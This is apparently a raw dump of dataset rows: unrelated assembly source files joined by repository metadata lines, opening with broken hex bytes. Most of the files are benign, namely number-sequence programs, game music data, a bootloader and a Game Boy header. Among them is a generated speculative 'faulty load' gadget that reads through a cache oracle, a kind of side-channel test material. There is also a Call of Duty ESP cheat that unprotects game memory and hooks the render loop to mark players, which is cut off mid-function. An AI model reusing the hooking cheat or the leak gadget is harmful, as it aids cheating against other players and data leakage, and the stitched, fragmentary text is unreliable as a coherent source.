54 00 54 54 54 54 3c 54 82 54 54 66 54 54 54 26 da 54 00 de 54 3a 54 58 54 0a cc 54 fa 54 4c 54 54 54 54 5e ae e0 54 54 00 d0 54 ee 50 36 54 e2 54 54 54 36 54 54 b0 54 58 54 5e 54 54 d8 54 6a a6 54 54 54 54 98 54 5e 54 54 78 20 54 4e 58 54 9c 54 54 54 ac
*/
| 46.10241 | 2,999 | 0.614661 |
34f762c5f648c1b49a63f3ae450706585ea3d250 | 782 | asm | Assembly | oeis/110/A110322.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/110/A110322.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/110/A110322.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A110322: Row sums of a number triangle related to the Jacobsthal numbers.
; Submitted by Christian Krause
; 1,2,9,52,425,4206,50737,708464,11350257,204171130,4084757561,89849981772,2156575777369,56068679418662,1569955094823585,47098171778191816,1507149193966389857,51242941744764975474,1844748258113200151017,70100389057570046093540,2804016457317433036643721,117768672412024932488091742,5181821999625856640596816529,238363802472363934411675623072,11441462746923680157099100401745,572073131639928725221488257730026,29747802993638931059987525223249177,1606381357650711068830632694880684284
mov $2,$0
add $2,1
mov $4,$0
lpb $2
mov $0,$4
sub $2,1
sub $0,$2
sub $3,$1
mul $1,$0
mov $6,$0
mul $6,$3
mov $3,$5
mul $6,2
sub $3,$6
add $3,1
add $1,$3
lpe
mov $0,$1
| 34 | 481 | 0.799233 |
02b2a26c018a39973157894cda24c586e9f2424f | 6,506 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_sm_/i7-7700_9_0x48.log_9974_628.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i7-7700_9_0x48.log_9974_628.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i7-7700_9_0x48.log_9974_628.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r14
push %r15
push %r9
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x22ad, %r9
nop
nop
nop
and %r14, %r14
movb (%r9), %dl
nop
add %r12, %r12
lea addresses_WC_ht+0xc5ad, %rsi
lea addresses_UC_ht+0x18ad, %rdi
nop
add %r15, %r15
mov $28, %rcx
rep movsq
cmp $62013, %r14
lea addresses_WC_ht+0x1c1ad, %rsi
lea addresses_D_ht+0x263c, %rdi
xor %r12, %r12
mov $119, %rcx
rep movsw
nop
cmp $60916, %rsi
lea addresses_A_ht+0x1122d, %r12
nop
nop
nop
nop
dec %r9
mov (%r12), %edx
nop
nop
nop
nop
cmp %rsi, %rsi
lea addresses_WC_ht+0x10d2d, %r15
nop
nop
nop
and $40027, %r12
mov $0x6162636465666768, %rcx
movq %rcx, (%r15)
dec %rdx
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %r9
pop %r15
pop %r14
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r11
push %r15
push %r8
push %rbp
push %rcx
push %rdi
// Load
lea addresses_A+0x1574d, %rbp
clflush (%rbp)
nop
nop
sub %r11, %r11
movaps (%rbp), %xmm3
vpextrq $1, %xmm3, %r10
nop
nop
nop
cmp %r8, %r8
// Store
lea addresses_normal+0x15ec0, %r11
sub %rdi, %rdi
movl $0x51525354, (%r11)
nop
nop
nop
nop
nop
add $53264, %r11
// Store
lea addresses_WC+0x152ad, %r15
nop
nop
nop
nop
cmp $32929, %rcx
movw $0x5152, (%r15)
nop
cmp $23661, %r11
// Store
lea addresses_A+0x1095d, %r11
nop
inc %r10
movl $0x51525354, (%r11)
nop
nop
dec %r15
// Store
lea addresses_UC+0x1c5ad, %rbp
and %rdi, %rdi
movb $0x51, (%rbp)
nop
sub %rdi, %rdi
// Store
lea addresses_US+0x15dad, %rdi
and $47642, %r10
movb $0x51, (%rdi)
nop
nop
nop
nop
xor $60980, %r11
// Faulty Load
lea addresses_UC+0x1c5ad, %r8
cmp %r15, %r15
mov (%r8), %ecx
lea oracles, %rbp
and $0xff, %rcx
shlq $12, %rcx
mov (%rbp,%rcx,1), %rcx
pop %rdi
pop %rcx
pop %rbp
pop %r8
pop %r15
pop %r11
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_UC', 'AVXalign': False, 'congruent': 0, 'size': 8, 'same': False, 'NT': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_A', 'AVXalign': True, 'congruent': 5, 'size': 16, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'AVXalign': False, 'congruent': 0, 'size': 4, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC', 'AVXalign': True, 'congruent': 5, 'size': 2, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A', 'AVXalign': False, 'congruent': 4, 'size': 4, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC', 'AVXalign': True, 'congruent': 0, 'size': 1, 'same': True, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_US', 'AVXalign': True, 'congruent': 11, 'size': 1, 'same': False, 'NT': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_UC', 'AVXalign': False, 'congruent': 0, 'size': 4, 'same': True, 'NT': False}}
<gen_prepare_buffer>
{'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 0, 'size': 1, 'same': False, 'NT': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC_ht', 'congruent': 11, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 5, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC_ht', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 0, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 7, 'size': 4, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 6, 'size': 8, 'same': False, 'NT': False}}
{'51': 9974}
51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51 51
*/
| 37.825581 | 2,999 | 0.651245 |
045c93a327f161a9a297dc21bbaafb8f1f3e6094 | 3,037 | asm | Assembly | sk/music/Chaos Emerald.asm | Cancer52/flamedriver | 9ee6cf02c137dcd63e85a559907284283421e7ba | [
"0BSD"
] | 9 | 2017-10-09T20:28:45.000Z | 2021-06-29T21:19:20.000Z | sk/music/Chaos Emerald.asm | Cancer52/flamedriver | 9ee6cf02c137dcd63e85a559907284283421e7ba | [
"0BSD"
] | 12 | 2018-08-01T13:52:20.000Z | 2022-02-21T02:19:37.000Z | sk/music/Chaos Emerald.asm | Cancer52/flamedriver | 9ee6cf02c137dcd63e85a559907284283421e7ba | [
"0BSD"
] | 2 | 2018-02-17T19:50:36.000Z | 2019-10-30T19:28:06.000Z | Snd_Emerald_Header:
smpsHeaderStartSong 3, 1
smpsHeaderVoice Snd_Emerald_Voices
smpsHeaderChan $07, $03
smpsHeaderTempo $01, $35
smpsHeaderDAC Snd_Emerald_DAC
smpsHeaderFM Snd_Emerald_FM1, $F4, $08
smpsHeaderFM Snd_Emerald_FM2, $F4, $08
smpsHeaderFM Snd_Emerald_FM3, $F4, $07
smpsHeaderFM Snd_Emerald_FM4, $F4, $16
smpsHeaderFM Snd_Emerald_FM5, $F4, $16
smpsHeaderFM Snd_Emerald_FM6, $F4, $16
smpsHeaderPSG Snd_Emerald_PSG1, $F4, $02, $00, sTone_04
smpsHeaderPSG Snd_Emerald_PSG2, $F4, $02, $00, sTone_05
smpsHeaderPSG Snd_Emerald_PSG3, $F4, $00, $00, sTone_04
; FM3 Data
Snd_Emerald_FM3:
smpsAlterNote $02
; FM1 Data
Snd_Emerald_FM1:
smpsSetvoice $00
dc.b nE5, $06, nG5, nC6, nE6, $0C, nC6, nG6, $2A
smpsStop
; FM2 Data
Snd_Emerald_FM2:
smpsSetvoice $00
dc.b nC5, $06, nE5, nG5, nC6, $0C, nA5, nD6, $2A
smpsStop
; FM4 Data
Snd_Emerald_FM4:
smpsSetvoice $01
dc.b nE5, $0C, nE5, $06, nG5, $06, nRst, nG5, nRst, nC6, $2A
smpsStop
; FM5 Data
Snd_Emerald_FM5:
smpsSetvoice $01
dc.b nC6, $0C, nC6, $06, nE6, $06, nRst, nE6, nRst, nG6, $2A
smpsStop
; FM6 Data
Snd_Emerald_FM6:
smpsSetvoice $01
dc.b nG5, $0C, nG5, $06, nC6, $06, nRst, nC6, nRst, nE6, $2A
smpsStop
; PSG2 Data
Snd_Emerald_PSG2:
dc.b nRst, $2D
Snd_Emerald_Loop01:
dc.b nG5, $06, nF5, nE5, nD5
smpsPSGAlterVol $03
smpsLoop $00, $04, Snd_Emerald_Loop01
smpsStop
; PSG1 Data
Snd_Emerald_PSG1:
smpsFade $01
dc.b nRst, $02, nRst, $2D
Snd_Emerald_Loop00:
dc.b nG5, $06, nF5, nE5, nD5
smpsPSGAlterVol $03
smpsLoop $00, $04, Snd_Emerald_Loop00
; DAC Data
Snd_Emerald_DAC:
; PSG3 Data
Snd_Emerald_PSG3:
smpsStop
Snd_Emerald_Voices:
; Voice $00
; $04
; $35, $72, $54, $46, $1F, $1F, $1F, $1F, $07, $0A, $07, $0D
; $00, $0B, $00, $0B, $1F, $0F, $1F, $0F, $23, $14, $1D, $80
smpsVcAlgorithm $04
smpsVcFeedback $00
smpsVcUnusedBits $00
smpsVcDetune $04, $05, $07, $03
smpsVcCoarseFreq $06, $04, $02, $05
smpsVcRateScale $00, $00, $00, $00
smpsVcAttackRate $1F, $1F, $1F, $1F
smpsVcAmpMod $00, $00, $00, $00
smpsVcDecayRate1 $0D, $07, $0A, $07
smpsVcDecayRate2 $0B, $00, $0B, $00
smpsVcDecayLevel $00, $01, $00, $01
smpsVcReleaseRate $0F, $0F, $0F, $0F
smpsVcTotalLevel $80, $1D, $14, $23
; Voice $01
; $3C
; $31, $52, $50, $30, $52, $53, $52, $53, $08, $00, $08, $00
; $04, $00, $04, $00, $10, $07, $10, $07, $1A, $80, $16, $80
smpsVcAlgorithm $04
smpsVcFeedback $07
smpsVcUnusedBits $00
smpsVcDetune $03, $05, $05, $03
smpsVcCoarseFreq $00, $00, $02, $01
smpsVcRateScale $01, $01, $01, $01
smpsVcAttackRate $13, $12, $13, $12
smpsVcAmpMod $00, $00, $00, $00
smpsVcDecayRate1 $00, $08, $00, $08
smpsVcDecayRate2 $00, $04, $00, $04
smpsVcDecayLevel $00, $01, $00, $01
smpsVcReleaseRate $07, $00, $07, $00
smpsVcTotalLevel $80, $16, $80, $1A
| 26.408696 | 62 | 0.616068 |
548d55f2ec20cba2705b31b88ebbcef919a33acd | 7,142 | asm | Assembly | src/loader_main.asm | LittleFox94/Nyanix | 7a69932a81bde7b0a9c1b61fd814dc26d82c44e6 | [
"BSD-3-Clause"
] | 23 | 2017-09-12T12:28:09.000Z | 2022-03-26T12:20:13.000Z | src/loader_main.asm | The-Emankcin/Nyanix | b3bf53d88a11f65cc45e8ab18ee0567f33c94762 | [
"BSD-3-Clause"
] | null | null | null | src/loader_main.asm | The-Emankcin/Nyanix | b3bf53d88a11f65cc45e8ab18ee0567f33c94762 | [
"BSD-3-Clause"
] | 2 | 2017-12-30T00:40:43.000Z | 2022-03-23T16:43:13.000Z |
; Copyright (c) 2019, k4m1 <k4m1@protonmail.com>
; All rights reserved. See /LICENSE for full license agreement.
;
; This code is responsible of loading the kernel from boot device, and
; then relocating it to 0x100000.
;
%include "src/consoles.asm"
%include "src/bioscall.asm"
USED_SECTORS equ (SECTOR_CNT + 1)
kernel_sectors_left:
dd 0
kernel_entry_offset:
dw 0
current_target_addr:
dd 0x100000
current_sector:
db 0
loader_main:
push bp
mov bp, sp
; sector offset on disk is set to be amount of sectors this bootloader
; uses, so that we don't waste time looking for kernel header from
; within the bootloader.
mov byte [current_sector], USED_SECTORS
; normal disk read is used to first find the kernel header, only
; then after that we'll make use of extended disk read.
;
xor ecx, ecx
mov cl, 10
.kernel_load_loop:
call load_sector
call parse_kernel_header
jc .kernel_found
add byte [current_sector], 1
loop .kernel_load_loop
; kernel was not found, notify user and halt
mov si, msg_no_kernel
call panic
.kernel_found:
; load kernel expects 3 values to be set, all these are
; set by parse_kernel_header.
; - kernel_sectors_left: size of kernel
; - kernel_entry_offset: offset to kernel entry incase there's
; junk between bootloader & kernel
; - current_target_addr: address where to read disk to, this
; starts at 0x100000
;
pusha
mov eax, dword [kernel_sectors_left]
call write_serial_hex
shr eax, 16
call write_serial_hex
popa
call load_kernel
; prepare kernel entry address to EBX & setup 32-bit protected
; mode with simple GDT & disabled interrupts
mov ebx, 0x100000
add ebx, 8 ; sizeof kernel header
cli
lgdt [gdt32]
mov eax, cr0
or al, 1
mov cr0, eax
jmp 0x08:.protected_mode_entry
.protected_mode_entry:
mov ax, 0x10
mov es, ax
mov fs, ax
mov ds, ax
mov gs, ax
mov ss, ax
jmp [ebx]
; =================================================================== ;
; End of main "logic", rest is helper functions 'n stuff ;
; =================================================================== ;
; This function loads single sector from disk to memory, sector to read
; is choosen by [current_sector]
;
load_sector:
push bp
mov bp, sp
pusha
; do disk read (int 0x13, ax = 0x0210), target = 0x2000
mov bx, 0x2000
xor cx, cx
mov cl, byte [current_sector]
xor dx, dx
mov dl, byte [boot_device] ; this we get from code at mbr.asm
.read_start:
mov di, 5
.read:
mov ax, 0x0210
call do_bios_call_13h
jnc .read_done
dec di
test di, di
jnz .read
mov si, msg_disk_read_fail
call panic
.read_done:
popa
mov sp, bp
pop bp
ret
; This function parses kernel header, setting DAP and other
; variables accordingly.
;
parse_kernel_header:
push bp
mov bp, sp
clc ; clear carry flag, we'll set it if kernel is found
pusha
mov si, 0x2000
.search:
cmp dword [si], 'nyan'
je .found_hdr
inc si
cmp si, 0x2200 ; sector size = 0x200
jl .search
; kernel was not found :(
popa
.ret:
mov sp, bp
pop bp
ret
.found_hdr:
; kernel was found :)
mov eax, dword [si+4]
mov dword [kernel_sectors_left], eax
sub si, 0x2000
mov word [kernel_entry_offset], si
mov si, msg_kernel_found
call write_serial
popa
stc
jmp .ret
; load_kernel function is basicly a loop going through
; extended disk read untill we've loaded the whole kernel.
load_kernel:
push bp
mov bp, sp
pusha
.start:
; reads happen 0x28 sectors at time MAX.
cmp dword [kernel_sectors_left], 0x28
jle .final_iteration
mov word [DAP.sector_count], 0x28
jmp .do_read
.final_iteration:
mov ax, word [kernel_sectors_left]
mov word [DAP.sector_count], ax
.do_read:
; extended disk read: int=0x13, al=0x42
mov dword [DAP.transfer_buffer], 0x2000
mov dl, byte [boot_device]
mov al, 0x42
mov si, DAP
call do_bios_call_13h
jc .fail
mov si, msg_loaded_block
call write_serial
; relocate sectors to 0x100000 onwards
; reloaction adjusts target address for us
call kernel_relocate
; adjust remaining sector count
xor eax, eax
mov ax, word [DAP.sector_count]
sub dword [kernel_sectors_left], eax
cmp dword [kernel_sectors_left], 0
jne .start
; kernel has been loaded
popa
mov sp, bp
pop bp
ret
.fail:
mov si, msg_disk_read_fail
call panic
kernel_relocate:
push bp
mov bp, sp
pusha
; relocate sectors to 0x100000 onwards
; We could also relocate less than 0x28 sectors on last read but
; it's less logic, easier code when it's like this,
; someday, and that day might never come, but someday I will optimize
; this and make it better
mov ecx, ((0x28 * 512) / 4) ; amount of dwords to reloacte
; I'd much more prefer movsd here, but that'd mean we'd need to
; either constantly swap between 32 and 16 bit mode, as atleast on
; qemu movsN does use ds:si, es:di on 32-bit unreal mode too. This
; practically means we could only load to address 0xF:FFFF at most,
; which is still in MMI/O space (usually MOBO BIOS ROM to be exact).
; swap to 32-bit mode would allow us to use esi, edi, but that'd mean
; we'd need to load our whole kernel to low memory first,
; and find enough space to somehow fit it here..
; that'd limit us a *LOT*.
;
; One way would be that constant swap between 16 and 32 bit mode,
; but that's not something I want to do.
;
.relocation_loop_start:
mov edx, dword [current_target_addr]
mov ebx, 0x2000
.loop:
mov eax, dword [ebx]
mov dword [edx], eax
add ebx, 4
add edx, 4
loop .loop
; adjust target address
inc edx
mov dword [current_target_addr], edx
popa
mov sp, bp
pop bp
ret
; Some pretty messages to print
msg_no_kernel:
db "Bootloader did not find kernel from disk :(", 0x0
msg_disk_read_fail:
db "Failed to read disk, firmware bug?", 0x0
msg_kernel_found:
db "Found kernel, loading...", 0x0A, 0x0D, 0
msg_loaded_block:
db "Loaded up to 20kb of kernel/os from disk...", 0x0A, 0x0D, 0
; =================================================================== ;
; Disk Address Packet format: ;
; ;
; Offset | Size | Desc ;
; 0 | 1 | Packet size ;
; 1 | 1 | Zero ;
; 2 | 2 | Sectors to read/write ;
; 4 | 4 | transfer-buffer 0xffff:0xffff ;
; 8 | 4 | lower 32-bits of 48-bit starting LBA ;
; 12 | 4 | upper 32-bits of 48-bit starting LBAs ;
; =================================================================== ;
DAP:
.size:
db 0x10
.zero:
db 0x00
.sector_count:
dw 0x0000
.transfer_buffer:
dd 0x00000000
.lower_lba:
dd 0x00000000
.higher_lba:
dd 0x00000000
times (USED_SECTORS * 512) - ($ - $$) db 0
| 23.886288 | 77 | 0.624895 |
362fe6e05f932c66981f083fca92ad8f5c25d06b | 835 | asm | Assembly | Tareas/Ensamblador/tasm/BIN/proof.asm | TEC-2014092195/IC3101-Arquitectura_De_Computadores | 9f96940bd74f8899aadf18d9668f4314d6012b52 | [
"MIT"
] | null | null | null | Tareas/Ensamblador/tasm/BIN/proof.asm | TEC-2014092195/IC3101-Arquitectura_De_Computadores | 9f96940bd74f8899aadf18d9668f4314d6012b52 | [
"MIT"
] | null | null | null | Tareas/Ensamblador/tasm/BIN/proof.asm | TEC-2014092195/IC3101-Arquitectura_De_Computadores | 9f96940bd74f8899aadf18d9668f4314d6012b52 | [
"MIT"
] | null | null | null | datos segment
mensaje db "VIRUS",10,13,"$" ;Para imprimir $ pongo el ascii 24h
tablahex db "ABCDEF"
var2 db ?
tua db "Tuanis",10,13,"$"
FIL DB 20
COL DB 50
DIR DB 4
ASTERIX DB '*',0AH ; Fondo negro y asterisco verde CLARO
PAUSA1 dw 1000
PAUSA2 dw 1000 ; En total hace de pausa 10000x2000=20 000 000 de nops
datos EndS
codigo Segment
Enigma Macro Param, Num
mov cx,Num
Param:
push cx
xor dx,dx
mov dx,offset tua
mov ah,09h
int 21h
pop cx
loop Param
EndM
comienceaqui:
Assume cs:codigo, ds:datos
xor ax,ax
mov ax,Datos
mov Ds,Ax
xor dx, dx
mov dx,offset mensaje
mov ah,09h
int 21h
;mov ah,01h
;int 21h
;mov var2,al
mov dl,var2
mov ah,09h
int 21h
Enigma A,11h
mov ax,4c00h
int 21h
codigo EndS
End comienceaqui | 14.152542 | 71 | 0.632335 |
11170f29b5a5c5d52e001f055a054b04c6eeda16 | 836 | asm | Assembly | code/include/header.asm | sttng/merken-revision-2020 | c58ead89f9e00d5aa0ed306a1b1b750635bac6a6 | [
"MIT"
] | 31 | 2020-04-14T02:16:23.000Z | 2022-01-12T19:55:18.000Z | code/include/header.asm | sttng/merken-revision-2020 | c58ead89f9e00d5aa0ed306a1b1b750635bac6a6 | [
"MIT"
] | null | null | null | code/include/header.asm | sttng/merken-revision-2020 | c58ead89f9e00d5aa0ed306a1b1b750635bac6a6 | [
"MIT"
] | 2 | 2021-05-14T10:28:00.000Z | 2021-12-05T01:40:59.000Z | ;; NINTENDO LOGO
db $CE,$ED,$66,$66
db $CC,$0D,$00,$0B
db $03,$73,$00,$83
db $00,$0C,$00,$0D
db $00,$08,$11,$1F
db $88,$89,$00,$0E
db $DC,$CC,$6E,$E6
db $DD,$DD,$D9,$99
db $BB,$BB,$67,$63
db $6E,$0E,$EC,$CC
db $DD,$DC,$99,$9F
db $BB,$B9,$33,$3E
;; TITLE
db "B","A","L","I"
db "T", "A",$00,$00
db $00,$00,$00,$00
db $00,$00,$00
; GAMEBOY COLOR
db $00
;; MAKER
db $00,$00
;; MACHINE
db $00
;; CASSETTE TYPE
db $00
;; ROM SIZE
db $00
;; RAM SIZE
db $00
;; COUNTRY
db $01
;; GAMEBOY
db $00
;; ROM VERSION
db $00
;; NEGATIVE CHECK
db $67
;; CHECK SUM
db $00,$00 | 19.904762 | 28 | 0.373206 |
e37941b34f13d5e20f8248bc650844f14ec824cc | 619 | asm | Assembly | oeis/133/A133677.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/133/A133677.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/133/A133677.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A133677: Integers k such that prime(k)*(2*prime(k)-1)/3 is an integer.
; Submitted by Jamie Morken
; 1,2,3,5,7,9,10,13,15,16,17,20,23,24,26,28,30,32,33,35,39,40,41,43,45,49,51,52,54,55,56,57,60,62,64,66,69,71,72,76,77,79,81,83,86,87,89,91,92,94,96,97,98,102,103,104,107,108,109,113,116,118,119,120,123,124,126,128,132,135,137,139,140,142,144,146,148,150,152,154,156,158,160,161,162,164,165,166,170,171,173,176,178,182,184,185,186,190,192,194
lpb $0
mov $2,$0
mul $0,$3
trn $2,1
seq $2,138969 ; Positions of the primes congruent to 2 mod 3 when all primes except 3 are listed in order.
lpe
mov $0,$2
add $0,1
| 47.615385 | 342 | 0.689822 |
0728733f2726d89e9de95f9ba379b6ddb0cc79ee | 4,092 | asm | Assembly | Esp/Esp.asm | attilathedud/CoD_Hacks | 32d4b795c90c7cb187ae720a8226852101f1b388 | [
"MIT"
] | 10 | 2018-02-28T06:10:36.000Z | 2022-02-14T21:56:09.000Z | Esp/Esp.asm | attilathedud/CoD_Hacks | 32d4b795c90c7cb187ae720a8226852101f1b388 | [
"MIT"
] | null | null | null | Esp/Esp.asm | attilathedud/CoD_Hacks | 32d4b795c90c7cb187ae720a8226852101f1b388 | [
"MIT"
] | 4 | 2020-03-31T10:46:29.000Z | 2021-04-21T06:47:17.000Z | ; An internal ESP that works by hooking the game loop responsible for calling world-to-screen
; and loads a custom vm_main function that prints an "X" over the current location before rendering
; the entity.
;
; Originally written 2010/03/21 by attilathedud.
; System descriptors
.386
.model flat,stdcall
option casemap:none
VirtualAlloc proto stdcall :DWORD, :DWORD, :DWORD, :DWORD
VirtualProtect proto stdcall :DWORD, :DWORD, :DWORD, :DWORD
VirtualFree proto stdcall :DWORD, :DWORD, :DWORD
includelib \masm32\lib\kernel32.lib
.code
main:
jmp @F
ori_hook dd 4688efh
ori_vmmain dd 30021650h
eng_textout dd 4e3f00h
; White in CoD engine
colour dd 3f800000h,0,0,3f800000h
text db "X",0
@@:
; Save the current state of the stack.
push ebp
mov ebp,esp
; Ensure our dll was loaded validily.
mov eax,dword ptr ss:[ebp+0ch]
cmp eax,1
jnz @returnf
; Allocate memory for the old protection type.
; Store this location in ebx.
push eax
push 40h
push 1000h
push 4h
push 0
call VirtualAlloc
mov ebx,eax
; Unprotect the memory at 4688e6h-4688ebh
push ebx
push 40h
push 8h
push 4688e6h
call VirtualProtect
; Create a codecave in the rendering routine that will jump to our hook function.
; e9h is the opcode to jump, with the address of the jump being calculated by subtracting
; the address of the function to jump to from our current location.
mov byte ptr ds:[4688e6h],0e9h
lea ecx,@hook
sub ecx,4688ebh
mov dword ptr ds:[4688e7h],ecx
; Since our patched instruction is 8h bytes, loop through and nop out the remaining bytes.
mov ecx,4688ebh
@nop:
mov byte ptr ds:[ecx],90h
inc ecx
cmp ecx,4688eeh
jl @nop
; Reprotect the memory we just wrote.
push 0
push dword ptr ds:[ebx]
push 8h
push 4688e6h
call VirtualProtect
; Free the memory we allocated for our protection type.
push 4000h
push 4h
push ebx
call VirtualFree
; Restore eax and the stack.
pop eax
@returnf:
leave
retn 0ch
; Hook in the world-to-screen function. At this point, eax holds the calling function,
; so we compare eax against the address for vm_main. If vm_main is the caller, load our
; custom function into eax for execution.
@hook:
pushfd
cmp eax,30021650h
jnz short @ncgame
lea eax,@vm_main
@ncgame:
; The original instructions.
popfd
test eax,eax
mov edx,dword ptr ss:[esp+164h]
jmp ori_hook
; Our custom vm_main. At this point, ebp+8h holds the player structure to be rendered
; along with x/y coordinates in world. By loading this into the call for textout, our
; "X" will be rendered on top of the player.
@vm_main:
; Save the base pointer and load the stack pointer into it.
push ebp
mov ebp,esp
; Call the original vm_main to take care of rendering the player.
push dword ptr ss:[ebp+38h]
push dword ptr ss:[ebp+34h]
push dword ptr ss:[ebp+30h]
push dword ptr ss:[ebp+2ch]
